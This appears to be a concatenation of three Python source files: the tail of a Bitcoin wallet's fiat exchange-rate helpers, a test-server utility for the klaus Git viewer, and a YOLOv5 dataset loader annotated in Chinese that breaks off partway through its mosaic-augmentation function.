self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
utils.py
|
import os
import time
import contextlib
import werkzeug.serving
import threading
import klaus
TEST_SITE_NAME = "Some site"
HTDIGEST_FILE = "tests/credentials.htdigest"
TEST_REPO = os.path.abspath("tests/repos/build/test_repo")
TEST_REPO_URL = "test_repo/"
UNAUTH_TEST_SERVER = "http://invalid:password@localhost:9876/"
UNAUTH_TEST_REPO_URL = UNAUTH_TEST_SERVER + TEST_REPO_URL
AUTH_TEST_SERVER = "http://testuser:testpassword@localhost:9876/"
AUTH_TEST_REPO_URL = AUTH_TEST_SERVER + TEST_REPO_URL
TEST_REPO_NO_NEWLINE = os.path.abspath("tests/repos/build/no-newline-at-end-of-file")
TEST_REPO_NO_NEWLINE_URL = UNAUTH_TEST_SERVER + "no-newline-at-end-of-file/"
TEST_REPO_DONT_RENDER = os.path.abspath("tests/repos/build/dont-render")
TEST_REPO_DONT_RENDER_URL = UNAUTH_TEST_SERVER + "dont-render/"
ALL_TEST_REPOS = [TEST_REPO, TEST_REPO_NO_NEWLINE, TEST_REPO_DONT_RENDER]
@contextlib.contextmanager
def serve(*args, **kwargs):
app = klaus.make_app(ALL_TEST_REPOS, TEST_SITE_NAME, *args, **kwargs)
server = werkzeug.serving.make_server("localhost", 9876, app)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
try:
yield
finally:
server.server_close()
if 'TRAVIS' in os.environ:
# This fixes some "Address already in use" cases on Travis.
time.sleep(1)
def serve_require_auth(*args, **kwargs):
kwargs['htdigest_file'] = open(HTDIGEST_FILE)
kwargs['require_browser_auth'] = True
return testserver(*args, **kwargs)
|
datasets.py
|
# YOLOv5 dataset utils and dataloaders
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from yolov5_master.utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from yolov5_master.utils.general import check_requirements, check_file, check_dataset, xywh2xyxy, xywhn2xyxy, xyxy2xywhn, \
xyn2xy, segments2boxes, clean_str
from yolov5_master.utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
# 图像格式
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
# 视频格式
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
# CPU线程数
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
"""返回路径(文件或目录)列表的单个哈希值"""
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
"""根据图片的信息获取图片的宽、高信息"""
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""如果PIL图像具有EXIF方向标记,则相应地对其进行转置。"""
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
"""根据LoadImagesAndLabels创建dataloader
参数解析:
:param path:包含图片路径的txt文件或者包含图片的文件夹路径
:param imgsz:网络输入图片大小
:param batch_size: 批次大小
:param stride:网络下采样最大总步长
:param single_cls:是否为单类
:param hyp:网络训练时的一些超参数,包括学习率等,这里主要用到里面一些关于数据增强(旋转、平移等)的系数
:param augment:是否进行数据增强
:param cache:是否提前缓存图片到内存,以便加快训练速度
:param pad:设置矩形训练的shape时进行的填充
:param rect:是否进行矩形训练
:param rank: 多卡训练时的进程编号
:param workers: 加载数据时的cpu进程数
:param image_weights:训练时是否对图片进行采样的权重
:param quad: 是否使用collate_fn4作为dataloader的选择函数
:param prefix: 一个标志,多为train/val,处理标签时保存cache文件会用到
"""
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
"""重载工作的数据加载器,使用与vanilla DataLoader相同的语法"""
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
# os.path.abspath(p)返回p的绝对路径
p = str(Path(path).absolute()) # os-agnostic absolute path
# 如果采用正则化表达式提取图片/视频,直接使用glob获取文件路径
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
# 如果path是一个文件夹,使用glob获取全部文件路径
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
# 是文件则直接获取
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
# os.path.splitext分离文件名和后缀(后缀包含.)
# 分别提取图片和视频文件路径
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
# 图片与视频数量
ni, nv = len(images), len(videos)
self.img_size = img_size # 输入图片size
self.stride = stride # 步长,在letterbox是会使用
self.files = images + videos # 整合图片和视频路径到一个列表
self.nf = ni + nv # number of files # number of files # 总的文件数量
self.video_flag = [False] * ni + [True] * nv # 设置判断是否为视频的bool变量,方便后面单独对视频进行处理
self.mode = 'image' # 初始化模块信息,代码中对于mode=images与mode=video有不同处理
# 如果包含视频文件,这将初始化opencv中的视频模块,cap=cv2.VideoCapture等
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
# nf如果小于0,则打印提示信息
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
# self.count == self.nf表示数据读取完毕
if self.count == self.nf:
raise StopIteration
# 获取文件路径
path = self.files[self.count]
# 如果该文件为视频,
if self.video_flag[self.count]:
# Read video
# 修改mode为ideo
self.mode = 'video'
# 获取当前帧 画面,ret_val为一个bool变量,直到视频读取完毕之前都为True
ret_val, img0 = self.cap.read()
# 如果当前视频读取结束,则读取下一个视频
if not ret_val:
self.count += 1
# 释放视频对象
self.cap.release()
# self.count == self.nf表示视频已经读取完毕
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
# 当前读取的帧数
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
# 读取图片
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
# 对图片进行resize+pad
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
# BGR转为RGB格式,channel轴换到前面
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
# 将数组内存转为连续,提高运行速度,(不转的话也可能会报错)
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
# frame用来记录帧数
self.frame = 0
# 初始化视频对象
self.cap = cv2.VideoCapture(path)
# 视频文件中的总帧数
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
# 初始化mode为stream(视频流)
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
# 如果sources为一个保存了多个视频流的文件
# 获取每一个视频流,保存为一个列表
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
# 打印当前视频/总视频数/视频流地址
print(f'{i + 1}/{n}: {s}... ', end='')
# 如果来源是youtobe,则检查环境, 导入pafy
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
# 如果source=0则打开摄像头,否则打开视频流地址
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
# 获取视频的宽和长
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# 获取视频的帧率
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
# 获取视频总长度
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
# 读取当前画面
_, self.imgs[i] = cap.read() # guarantee first frame
# 创建多线程读取视频流,daemon表示主线程结束时子线程也结束
self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
# 获取进行resize+pad之后的shape,
# letterbox函数默认(参数auto=True)是按照矩形推理进行填充
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
self.imgs[i] = im if success else self.imgs[i] * 0
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
# 对图片进行resize+pad
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
# 将读取的图片拼接到一起
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size # 输入图片分辨率大小
self.augment = augment # 数据增强
self.hyp = hyp # 超参数
self.image_weights = image_weights # 图片采样
self.rect = False if image_weights else rect # 矩形训练
# load 4 images at a time into a mosaic (only during training)
self.mosaic = self.augment and not self.rect # mosaic数据增强
self.mosaic_border = [-img_size // 2, -img_size // 2] # mosaic数据增强边界
self.stride = stride # 模型下采样的总步长
self.path = path # 数据路径
self.albumentations = Albumentations() if augment else None # albumentations数据增强
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
# 获取数据集路径path,包含图片路径的txt文件或者包含图片的文件夹路径
# 使用pathlib.Path生成与操作系统无关的路径,因为不同操作系统路径的‘/’会有所不同
p = Path(p) # os-agnostic
# 如果路径path为包含图片的文件夹路径
if p.is_dir(): # dir
# 递归获取p路径下所有文件
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
# 如果路径path为包含图片路径的txt文件
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
# 获取数据集路径的上级父目录,os.sep为路径里的破折号(不同系统路径破折号不同,os.sep根据系统自适应)
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
# 破折号替换为os.sep,os.path.splitext(x)将文件名与扩展名分开并返回一个列表
# 筛选f中所有的图片文件
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
# 获取数据集的标签文件路径
self.label_files = img2label_paths(self.img_files) # labels
# 设置标签cache文件路径
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
# 如果有cache文件,直接加载
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
except:
# 否则调用cache_labels缓存标签及标签相关信息
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
# 漏掉的标签数量,找到的标签数量,空的标签数量,数据子集的数量,相同的标签数量
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
# 如果存在cache文件,直接显示标签信息
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
# 去除cache文件中其他无关键值
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
# 获取数据集的标签文件路径
self.label_files = img2label_paths(cache.keys()) # update
# 如果是单类,则强制将标签中所有类别标签设置为0
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
# 矩形训练
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
# 获取根据ar从小到大排序的索引
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
# 根据索引排序数据集与标签路径、shape、h/w
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
# 初始化shapes,nb为一轮批次batch的数量
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
# 如果一个batch中最大的h/w小于1,则此batch的shape为(img_size*maxi, img_size)
if maxi < 1:
shapes[i] = [maxi, 1]
# 如果一个batch中最小的h/w大于1,则此batch的shape为(img_size, img_size/mini)
elif mini > 1:
shapes[i] = [1, 1 / mini]
# 注意这里有个pad,且单独调用test的时候传入pad=0.5
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
# 初始化图片与标签,为缓存图片、标签做准备
self.imgs, self.img_npy = [None] * n, [None] * n
# 提前缓存图片到内存中,可以提升训练速度
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
"""加载label信息生成cache文件"""
# Cache dataset labels, check images and read shapes
x = {} # dict
# 漏掉的标签数量,找到的标签数量,空的标签数量,错误标签数量
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
# 这里是多进程调用verify_image_label
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
# 保存标签信息,图片shape到cache文件
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
# 保存信息到cache文件
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = 0.4 # cache version
try:
# 保存cache
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
# 超参数
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
# 使用mosaic数据增强方式加载
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
# mixup数据增强
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
# 加载图片并根据设定的输入大小与图片原大小的比例ratio进行resize(未做填充pad到正方形)
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
# 如果进行矩形训练,则获取每个batch的输入图片的shape
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
# 根据shape对图片做resize和pad填充,返回resize+pad之后的图片、缩放因子ratio、填充大小pad
# 如果未进行矩形训练,则只进行pad填充到正方形
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
# 根据pad调整框的标签坐标,并从归一化的xywh->未归一化的xyxy
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# 随机对图片进行旋转,平移,缩放,裁剪,透视变换
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
# 调整框的标签坐标,从未归一化的xyxy->归一化的xywh
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
# 调用albumentations增强
img, labels = self.albumentations(img, labels)
# HSV color-space
# 随机改变图片的色调(H),饱和度(S),亮度(V)
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
# 图片随机上下翻转
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
# 图片随机左右翻转
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# 初始化标签框对应的图片序号,配合下面的collate_fn使用
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
"""
pytorch的DataLoader打包一个batch的数据集时要经过此函数进行打包
通过重写此函数实现标签与图片对应的划分,一个batch中哪些标签属于哪一张图片,形如
[[0, 6, 0.5, 0.5, 0.26, 0.35],
[0, 6, 0.5, 0.5, 0.26, 0.35],
[1, 6, 0.5, 0.5, 0.26, 0.35],
[2, 6, 0.5, 0.5, 0.26, 0.35],]
前两行标签属于第一张图片,第三行属于第二张。。。
"""
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
"""将一个batch的图片每四张处理,
0.5的概率将四张图片拼接到一张大图上训练,
0.5概率直接将某张图片上采样两倍训练"""
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
# 定义标签相对于大图偏移量
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
"""读取图片和长宽, 并保持长宽比resize到input-size"""
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
# 根据ratio选择不同的插值方式
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
"""mosaic数据增强,拼接四张图"""
# loads images in a 4-mosaic
global img4, y1a, y2a, x1a, x2a, y1b, y2b, x1b, x2b
labels4, segments4 = [], []
s = self.img_size
# 随机取mosaic中心点
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
# 随机取其他三张图片的索引
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
# 加载图片
img, _, (h, w) = load_image(self, index)
# place img in img4
# img在img4中的位置
if i == 0: # top left
# 初始化大图
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
# 设置位置为左上角top_left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
# 设置位置为右上角top_right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
# 设置位置为左下角bottom_left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
# 设置位置为右下角bottom_right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
# 将小图上截取的部分贴到大图上
